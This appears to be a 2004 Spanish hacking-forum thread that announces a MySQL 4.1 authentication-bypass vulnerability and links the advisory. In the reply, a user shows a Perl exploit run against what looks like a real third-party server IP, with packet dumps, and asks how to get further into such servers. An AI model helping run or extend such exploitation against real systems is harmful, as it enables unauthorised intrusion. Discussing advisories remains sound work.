elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Doble factor de autenticación o verificación en dos pasos


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Vulnerabilidad en MySQL que permite autenticarse sin conocer el pasword
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Vulnerabilidad en MySQL que permite autenticarse sin conocer el pasword  (Leído 4,309 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 19.317


La libertad no se suplica, se conquista


Ver Perfil WWW
Vulnerabilidad en MySQL que permite autenticarse sin conocer el pasword
« en: 8 Julio 2004, 05:02 »

La gente de NSG ha descubierto un fallo en MySQL que permite saltarse el mecanismo de autenticación.

El mismo método puede ser utilizado también para causar un oberflow y dejar fuera de servicio el MySQL.

Se ven afectadas las verisiones 4.1 y anteriores.

Al anuncio oficial lo puedes encontrar en:

http://www.nextgenss.com/advisories/mysql-authbypass.txt

Además han publicado un pdf muy interesante en el que profundizan en este y otros temas relacionados con los ataques SQL.
http://www.nextgenss.com/papers/HackproofingMySQL.pdf

Fuente:
http://www.cyruxnet.com.ar/news.htm



No queda muy claro, pero creo que la rama 4.0.x (la estable y recomendada) no tiene este problema.

Tampoco lo tiene la rama 3.23.x, que ya "casi" no se utiliza.
« Última modificación: 8 Julio 2004, 08:41 por el-brujo » En línea

Since 2001, still kicking hard
jank0

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Vulnerabilidad en MySQL que permite autenticarse sin conocer el pasword
« Respuesta #1 en: 2 Agosto 2004, 14:51 »

A ver si me puedes dar una mano en esto...
tengo el dicho exploit para esa vulnerabilidad... pero en realidad no se que es lo que hace :S he encontrado servers vulnerables y solo me sale el "authentication successful" y de ahi no pasa ...
ej:

$ perl mysql.pl mysql 210.66.38.10 3306
Received greeting:
00000000        48 00 00 00 FF 6A 04 48 6F 73 74 20 27 32 30 30
00000010        2E 31 37 38 2E 32 35 34 2E 31 33 30 27 20 69 73
00000020        20 6E 6F 74 20 61 6C 6C 6F 77 65 64 20 74 6F 20
00000030        63 6F 6E 6E 65 63 74 20 74 6F 20 74 68 69 73 20
00000040        4D 79 53 51 4C 20 73 65 72 76 65 72

Sending caps packet:
00000000        3B 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00
00000010        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000020        00 00 00 00 6D 79 73 71 6C 00 14 00 00 00 00 00
00000030        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Received reply:
00000000
Received OK reply, authentication successful!!
$
pero devuelve a mi prompt no al del server :S
Gracias...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines